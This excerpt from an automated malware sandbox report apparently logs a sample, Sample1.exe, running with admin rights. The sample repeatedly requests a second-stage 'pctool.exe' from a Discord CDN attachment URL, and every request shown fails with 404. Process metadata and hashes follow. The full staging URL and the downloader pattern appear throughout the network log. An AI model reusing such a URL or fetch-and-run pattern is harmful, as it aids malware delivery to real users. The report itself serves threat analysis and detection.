                        Set-Cookie: __cf_bm=OqRPzqswIra6hrO2UMaiauvkrdOa5mPQL77UDQFLdTg-1736950855-1.0.1.1-76A8DL_EqI39Me6hU4zgBZV5VLQg7YrL1eZ_DzwakCJNzxI9eucpbrkjPd3hcLgh0Q4ChTiMTDUVaXdE2xyo.w; path=/; expires=Wed, 15-Jan-25 14:50:55 GMT; domain=.discordapp.com; HttpOnly; Secure
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MqIdWA1mCptmabeiTo3tSGkOF7dTUqx0YGq9Td%2FYJDm%2FJHr4LFzIeZZkPW%2BtxoYVgZafYHa9RLxFpX%2BQLJ2f8Trdi7WG%2BKmxqJxaDM5%2BTHg8rzW05C7XThe9ufT5N%2BQbIPy3rg%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                        Set-Cookie: _cfuvid=w7eapzP9i9t_v4lD3E.BQ4DmetI5GOQRIEohT_Fnk2E-1736950855193-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                        Server: cloudflare
                        CF-RAY: 9026825ccfed4210-EWR
                        alt-svc: h3=":443"; ma=86400
                        2025-01-15 14:20:55 UTC36INData Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                        Data Ascii: This content is no longer available.


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        23192.168.2.2549755162.159.134.2334438064C:\Users\user\Desktop\Sample1.exe
                        TimestampBytes transferredDirectionData
                        2025-01-15 14:21:00 UTC104OUTGET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
                        Host: cdn.discordapp.com
                        2025-01-15 14:21:00 UTC1041INHTTP/1.1 404 Not Found
                        Date: Wed, 15 Jan 2025 14:21:00 GMT
                        Content-Type: text/plain;charset=UTF-8
                        Content-Length: 36
                        Connection: close
                        Set-Cookie: __cf_bm=EjKIvZu2Vc4zsIOBxB21KbUxoBcmYanzCAkQrjqi2nQ-1736950860-1.0.1.1-IKrPhvcr9VkiSZpVks0ijjgFopbad0QfPhgCCOiwpp0P3I.X44k_BfplrEL0fd6feu.9tewf0vIygp8bPQk3Bw; path=/; expires=Wed, 15-Jan-25 14:51:00 GMT; domain=.discordapp.com; HttpOnly; Secure
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gXFzlh75Z6LQ73E77XDXtxFvv1deBzgKy01CL6nYETm5uG0O1tVeA00XHxdqGbxIL2tT8pSbDQQ0vw1PymOmxAFYOgzDDONjkJp4S8TPtEzCeoOSNz4eQHQ2sD3TgevBmdJhjA%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                        Set-Cookie: _cfuvid=Jft4aplAsvvXiz.Oj6lDanZ.2MoO_.FleHx1d4SE22E-1736950860860-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                        Server: cloudflare
                        CF-RAY: 902682803d7e421b-EWR
                        alt-svc: h3=":443"; ma=86400
                        2025-01-15 14:21:00 UTC36INData Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                        Data Ascii: This content is no longer available.


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        24192.168.2.2549757162.159.134.2334438064C:\Users\user\Desktop\Sample1.exe
                        TimestampBytes transferredDirectionData
                        2025-01-15 14:21:06 UTC104OUTGET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
                        Host: cdn.discordapp.com
                        2025-01-15 14:21:06 UTC1047INHTTP/1.1 404 Not Found
                        Date: Wed, 15 Jan 2025 14:21:06 GMT
                        Content-Type: text/plain;charset=UTF-8
                        Content-Length: 36
                        Connection: close
                        Set-Cookie: __cf_bm=XI9gK2oL9f3Opz0bNjet2QRYJrDoohBIEY1iZ.4sMqA-1736950866-1.0.1.1-gm1en4m.__.4ZNGghrHlPwIXXmiKeGOkB9PvEaFaSVIWvN4hXX8SIEV_QeHGuSwEHwj5DM_n3DWxnIt04g6gMA; path=/; expires=Wed, 15-Jan-25 14:51:06 GMT; domain=.discordapp.com; HttpOnly; Secure
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h4SIjozg82ijxSCfGJ8Q9hTuUxaosoBpt9UrG898VI7Fc24NqHHCbFnTeRCKxh67KTCY%2FVl73%2FD9anDRLCQZx4h0elAw4OY6Fr09CR%2BI03UWEtDNNttmv2QKahDPesdDIzVqRw%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                        Set-Cookie: _cfuvid=FBbmEqwgUfRtEFpmFDkWAve52ILyZqJZY1btgfwDmyQ-1736950866486-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                        Server: cloudflare
                        CF-RAY: 902682a36d6343c4-EWR
                        alt-svc: h3=":443"; ma=86400
                        2025-01-15 14:21:06 UTC36INData Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                        Data Ascii: This content is no longer available.


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        25192.168.2.2549760162.159.134.2334438064C:\Users\user\Desktop\Sample1.exe
                        TimestampBytes transferredDirectionData
                        2025-01-15 14:21:12 UTC104OUTGET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
                        Host: cdn.discordapp.com
                        2025-01-15 14:21:12 UTC1051INHTTP/1.1 404 Not Found
                        Date: Wed, 15 Jan 2025 14:21:12 GMT
                        Content-Type: text/plain;charset=UTF-8
                        Content-Length: 36
                        Connection: close
                        Set-Cookie: __cf_bm=17pMnJuZ.6ryANGF8z2CN1O1I9Gjw1_rLbRUFAJwWWA-1736950872-1.0.1.1-X7dJwzM9.IEixDuXu1uH_Pq_PdkAn5zQuI9ETZp.ubqsu6m.o0V1M51NdmPzokoKjC_kx1sQ8Py6lUDtLuFwsA; path=/; expires=Wed, 15-Jan-25 14:51:12 GMT; domain=.discordapp.com; HttpOnly; Secure
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M4XlyDN%2BI4OF6QIP3ByA7wN1MJtYq%2F3uahit77ykINdFt1as8hnN1YL9WC5fi6IgbGZYG2DgrmMRdb%2BD83I%2ByRbqNRNjV2GwE%2F9BBR0J7BZOn81LddhHXtuPadNL6JHBDevaOw%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                        Set-Cookie: _cfuvid=PzAvIVbuKdyGYphTd6qDkPwGW7YPf8_8ycZcqnvtv7Y-1736950872144-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                        Server: cloudflare
                        CF-RAY: 902682c6ba774387-EWR
                        alt-svc: h3=":443"; ma=86400
                        2025-01-15 14:21:12 UTC36INData Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                        Data Ascii: This content is no longer available.


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        26192.168.2.2549761162.159.134.2334438064C:\Users\user\Desktop\Sample1.exe
                        TimestampBytes transferredDirectionData
                        2025-01-15 14:21:17 UTC104OUTGET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
                        Host: cdn.discordapp.com
                        2025-01-15 14:21:17 UTC1051INHTTP/1.1 404 Not Found
                        Date: Wed, 15 Jan 2025 14:21:17 GMT
                        Content-Type: text/plain;charset=UTF-8
                        Content-Length: 36
                        Connection: close
                        Set-Cookie: __cf_bm=7itytyZjeje8HH5NJEDLC2hGsbclLJgfp1PjhnhCQF8-1736950877-1.0.1.1-jIKdIZp6erbnYvpnbUcXeAxUXA6u0Uwmi0WzuFif2LjCjknVy2ce5m5joUifmEHTumdRphUP2hmuI8VWQBA0.Q; path=/; expires=Wed, 15-Jan-25 14:51:17 GMT; domain=.discordapp.com; HttpOnly; Secure
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qY9N6tDOohDUYGt%2Bi%2FnRC82BYZh1nuFk4YgKvemyweVHoR7up9UT9jQqtKaq7XqG4sqrhvYLkYoHvwNSnU5GBNQuYgZL03nOehWIAzqkzz%2BNSrsidSIu6RS%2Fj%2BVfCbHNJ35XaQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                        Set-Cookie: _cfuvid=njwbFFCxR0Q684HQPXN1uyB2gNhkRIqlQnkgntvTemQ-1736950877791-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                        Server: cloudflare
                        CF-RAY: 902682ea1ecb7283-EWR
                        alt-svc: h3=":443"; ma=86400
                        2025-01-15 14:21:17 UTC36INData Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                        Data Ascii: This content is no longer available.


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        27192.168.2.2549762162.159.134.2334438064C:\Users\user\Desktop\Sample1.exe
                        TimestampBytes transferredDirectionData
                        2025-01-15 14:21:23 UTC104OUTGET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
                        Host: cdn.discordapp.com
                        2025-01-15 14:21:23 UTC1049INHTTP/1.1 404 Not Found
                        Date: Wed, 15 Jan 2025 14:21:23 GMT
                        Content-Type: text/plain;charset=UTF-8
                        Content-Length: 36
                        Connection: close
                        Set-Cookie: __cf_bm=JHazBZRvc9UqMmFCRR_tAHcuo1nVcbOsIw.hQbivLw4-1736950883-1.0.1.1-cPSkozvbvEexP1mvxROP2GicRRLZqJ9uUr.JibBxLccQvnoZLY_dKWC96GcyeIaW7a._5elMe.JuX7iGmZ1QQg; path=/; expires=Wed, 15-Jan-25 14:51:23 GMT; domain=.discordapp.com; HttpOnly; Secure
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QMG0kIN61GS9QYB4B%2FPFxvNm1k14L6yuTNvy1Sd7VNBBHsDMLhk8wP56jDnFlF2FvfH22Z3g0NKxaJmel4HgY%2FqJe9vbnZmsli3yUMmxpjxjKqmu7VnjkicW0Q2Wba%2BcEsYX%2FQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                        Set-Cookie: _cfuvid=N7C0Syy_nx2pHdZN1tf9HcDl7jxC7hQnMZY_U6EMVfA-1736950883394-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                        Server: cloudflare
                        CF-RAY: 9026830d2c09de92-EWR
                        alt-svc: h3=":443"; ma=86400
                        2025-01-15 14:21:23 UTC36INData Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                        Data Ascii: This content is no longer available.


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        28192.168.2.2549765162.159.134.2334438064C:\Users\user\Desktop\Sample1.exe
                        TimestampBytes transferredDirectionData
                        2025-01-15 14:21:28 UTC104OUTGET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
                        Host: cdn.discordapp.com
                        2025-01-15 14:21:29 UTC1045INHTTP/1.1 404 Not Found
                        Date: Wed, 15 Jan 2025 14:21:29 GMT
                        Content-Type: text/plain;charset=UTF-8
                        Content-Length: 36
                        Connection: close
                        Set-Cookie: __cf_bm=grTr6ttAHBPGQ8Q2S1DHkZ2VC59011qNmpcfmQ5W1pQ-1736950889-1.0.1.1-me6Dos9HqCc_6TG43g74XBkMHuA65F9J.x2SwmzL_mLmk8t11umiFiojFwcSUpOQljZnCHOK.yszbkJ_S.MIKQ; path=/; expires=Wed, 15-Jan-25 14:51:29 GMT; domain=.discordapp.com; HttpOnly; Secure
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2CevIaFoHDm2hv8ycdC6lfCzubEqJSooCubJU%2Be2I06vbA4EFq7WorvkL9qCvqoAGaKPeP7Z9qpQuZH%2FPI87rNewTBqPJCFHjpmf3Dq7GQjWtcR4ZdVwi2tB1XhBSADKGoH7Yw%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                        Set-Cookie: _cfuvid=5W3Nw3iktPYLD1hnq4YUkLt_QKCzatIM.GQ66QFrdwc-1736950889040-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                        Server: cloudflare
                        CF-RAY: 902683306fcb41fe-EWR
                        alt-svc: h3=":443"; ma=86400
                        2025-01-15 14:21:29 UTC36INData Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                        Data Ascii: This content is no longer available.


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        29192.168.2.2549766162.159.134.2334438064C:\Users\user\Desktop\Sample1.exe
                        TimestampBytes transferredDirectionData
                        2025-01-15 14:21:34 UTC104OUTGET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
                        Host: cdn.discordapp.com
                        2025-01-15 14:21:34 UTC1043INHTTP/1.1 404 Not Found
                        Date: Wed, 15 Jan 2025 14:21:34 GMT
                        Content-Type: text/plain;charset=UTF-8
                        Content-Length: 36
                        Connection: close
                        Set-Cookie: __cf_bm=jYqDV_dHoqnJASbWyURgwLPNRh4uGD33YQah.5JPZww-1736950894-1.0.1.1-3ar16d7mzQbFy6PTY9jRr9vJim1yEx_U95C4LpMIY0j4SZTjjFfScwtpJEmkzQAPLd4qWjTosugpMnP5oogMFQ; path=/; expires=Wed, 15-Jan-25 14:51:34 GMT; domain=.discordapp.com; HttpOnly; Secure
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m0RTkPsyq7%2F9TzT3lcBzbzfSRvDBQrQgSnDn5xrLP55bwJjAzNEWyJgoJ6NVCm9alU359FgEUBy7o0PqpY1FlcVBeyqiYRaD3i9CnCNnTEx85k9EqlGNR3Odja85BXNZCBEjHw%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                        Set-Cookie: _cfuvid=GLeQt8XglSih9oznmL3CLCEqf12qzEHHApCOcawuAik-1736950894660-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                        Server: cloudflare
                        CF-RAY: 9026835378404309-EWR
                        alt-svc: h3=":443"; ma=86400
                        2025-01-15 14:21:34 UTC36INData Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                        Data Ascii: This content is no longer available.


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        30192.168.2.2549767162.159.134.2334438064C:\Users\user\Desktop\Sample1.exe
                        TimestampBytes transferredDirectionData
                        2025-01-15 14:21:40 UTC104OUTGET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
                        Host: cdn.discordapp.com
                        2025-01-15 14:21:40 UTC1045INHTTP/1.1 404 Not Found
                        Date: Wed, 15 Jan 2025 14:21:40 GMT
                        Content-Type: text/plain;charset=UTF-8
                        Content-Length: 36
                        Connection: close
                        Set-Cookie: __cf_bm=73UYw9EvSsc0a0M.WRnP44BmdzmqvBDTB9jERmKfMXw-1736950900-1.0.1.1-yU42jYrPUnmKi_.eIAEBxvAU1cm7InZ5Kd.jbRE0NpNZLn4gmAg5qjw7FDhe_O_p7PJA7nT..N5OWB900vzxKw; path=/; expires=Wed, 15-Jan-25 14:51:40 GMT; domain=.discordapp.com; HttpOnly; Secure
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Kx55dVHyVHm86W48OxbSOfL2IAZ3OSNy7jAUTDek%2BSrJ4yxQTniQAOhD81EY9z6zUBEjLkU0pyC5OWm%2BHB0RaWaaunyMzmqddegCUBJd6zypxdFDfKl0n6YBi0MUKDR2uLBY8Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                        Set-Cookie: _cfuvid=BulpUiyvq9AK99Qc4rJK71wKI_NoYU8EplBOFqW_dws-1736950900297-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                        Server: cloudflare
                        CF-RAY: 90268376bf624307-EWR
                        alt-svc: h3=":443"; ma=86400
                        2025-01-15 14:21:40 UTC36INData Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                        Data Ascii: This content is no longer available.


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        31192.168.2.2549768162.159.134.2334438064C:\Users\user\Desktop\Sample1.exe
                        TimestampBytes transferredDirectionData
                        2025-01-15 14:21:45 UTC104OUTGET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
                        Host: cdn.discordapp.com
                        2025-01-15 14:21:46 UTC1043INHTTP/1.1 404 Not Found
                        Date: Wed, 15 Jan 2025 14:21:45 GMT
                        Content-Type: text/plain;charset=UTF-8
                        Content-Length: 36
                        Connection: close
                        Set-Cookie: __cf_bm=or_KP0offYnOYYkYmqUaug5xUScRQSaiPGZeq88BmBQ-1736950905-1.0.1.1-Cqtnmaoqjd.nmvtWa9BMgHU2vhwlWVXOjA4GsjxB9CKfCs0ELg5p9J7.S8QYYKb99oH0AsrcXccU7GxWLFsgcQ; path=/; expires=Wed, 15-Jan-25 14:51:45 GMT; domain=.discordapp.com; HttpOnly; Secure
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KFTxLl0lTUFV1i6Bnh0tdynF3MhEak7RuzAY5Cb4VVnqA3V2pimOcJxfqXY2HwCWjXC3Hn3cBAC8V5BAQwLcIQ5m3WYEu9k4tnFWdgn9zHcAjJcyHkGCtQg5Siaxxb%2F7jXclnQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                        Set-Cookie: _cfuvid=I3LHV65WWujpF6Ec_yl_rVGqNqq1MSpYu3XhWcRvyHY-1736950905962-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                        Server: cloudflare
                        CF-RAY: 9026839a1afa7c78-EWR
                        alt-svc: h3=":443"; ma=86400
                        2025-01-15 14:21:46 UTC36INData Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                        Data Ascii: This content is no longer available.


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        32192.168.2.2549773162.159.134.2334438064C:\Users\user\Desktop\Sample1.exe
                        TimestampBytes transferredDirectionData
                        2025-01-15 14:21:51 UTC104OUTGET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
                        Host: cdn.discordapp.com
                        2025-01-15 14:21:51 UTC1045INHTTP/1.1 404 Not Found
                        Date: Wed, 15 Jan 2025 14:21:51 GMT
                        Content-Type: text/plain;charset=UTF-8
                        Content-Length: 36
                        Connection: close
                        Set-Cookie: __cf_bm=5Xh5vgxf_PxXeis0IHG7Ur.rV_K4Bcz5HTXLcXbskqA-1736950911-1.0.1.1-oylfIZKfgoAPvZeQ6iBkwy8b_jcEP8WwTCYiH7TaWVC5ba2lfBgR.AEOfjnzsY5dVOtbXmMiyGRo3DXpOz6fQA; path=/; expires=Wed, 15-Jan-25 14:51:51 GMT; domain=.discordapp.com; HttpOnly; Secure
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=StAGdgw89weyV1wmXhoWJcsidLqZrPf%2FKqao8kFAkiu9MdLKIGdG817SM0DKCCZUMn9op58htEidnTcQFEXorDj1eX%2BURxsg2BM04PuyJLEq9x9M5tYYGbjnvcSoJKeo4GgXfg%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                        Set-Cookie: _cfuvid=p0uvFfcKNyiNygzwFm1C9WSg2KTIV7YLEgd0tZ.mYsk-1736950911587-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                        Server: cloudflare
                        CF-RAY: 902683bd5831c35d-EWR
                        alt-svc: h3=":443"; ma=86400
                        2025-01-15 14:21:51 UTC36INData Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                        Data Ascii: This content is no longer available.


                        Statistics

                        CPU Usage

                        Click to jump to process

                        Memory Usage

                        Click to jump to process

                        High Level Behavior Distribution

                        Click to dive into process behavior distribution

                        Behavior

                        Click to jump to process

                        System Behavior

                        General

                        Target ID:0
                        Start time:09:18:46
                        Start date:15/01/2025
                        Path:C:\Users\user\Desktop\Sample1.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Users\user\Desktop\Sample1.exe"
                        Imagebase:0x750000
                        File size:8'192 bytes
                        MD5 hash:45A47D815F2291BC7FC0112D36AAAD83
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:false

                        General

                        Target ID:39
                        Start time:09:21:44
                        Start date:15/01/2025
                        Path:C:\Windows\System32\SystemSettingsBroker.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\System32\SystemSettingsBroker.exe -Embedding
                        Imagebase:0x7ff70cfb0000
                        File size:220'536 bytes
                        MD5 hash:899E65893CDEE7F9022DC9B583F94F0F
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:false

                        Disassembly

                        No disassembly